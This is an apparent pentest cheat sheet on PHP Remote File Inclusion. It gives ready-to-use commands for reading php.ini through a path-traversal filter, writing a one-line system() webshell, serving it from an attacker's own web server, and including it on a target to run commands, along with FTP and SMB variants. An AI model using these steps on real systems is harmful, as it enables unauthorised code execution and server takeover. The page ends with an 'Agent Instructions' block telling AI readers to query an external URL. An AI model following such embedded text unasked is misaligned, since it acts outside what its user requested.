# Remote File Inclusion (RFI)

## **Introduction**

> * RFI is basically an LFI which also allows **inclusion of remote URLs** in order to **include remote files**
> * The objectives are to **enumerate local ports and web application through SSRF vulnerabilities** or Gaining RCE by \*\*including a malicious script that we host on our server \*\*
> * Almost any RFI vulnerability is also an LFI vulnerability (by including a local URL rather than a remote URL)

***

## **Enumerate RFI Vulnerabilities**

1. Check if `allow_url_include` is enabled:
   * To do so, you need to read the PHP configuration file found at
   * (`/etc/php/X.Y/apache2/php.ini`) for Apache
   * (`/etc/php/X.Y/fpm/php.ini`) for Nginx,
   * where `X.Y` is your install PHP version
2. Read the PHP Configuration File using the base64 filter (to ensure everything is read properly)
   * `curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"`
3. Check if the option is set to ON: `echo 'BASE64VALUE' | base64 -d | grep allow_url_include`
4. This may not always be reliable, as even if this setting is enabled, the vulnerable function may not allow remote URL inclusion to begin with.
5. Try to include a URL, starting with a local url like `http://127.0.0.1:80/index.php` then, if that works, include a remote URL

***

## **Remote Code Execution from RFI**

Follow these steps:

1. Write the webshell payload file: `echo '<?php system($_GET["cmd"]); ?>' > shell.php`
2. Start a webserver: `sudo python3 -m http.server <LISTENING_PORT>`
3. Use RFI to gain RCE: `http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id`
4. The same thing can be done by starting a local `FTP` or `SMB` server and using `ftp://<OUR_IP>/shell.php&cmd=id` or `\\<OUR_IP>\share\shell.php`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.sfoffo.com/web-applications/web-attacks/remote-file-inclusion-rfi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.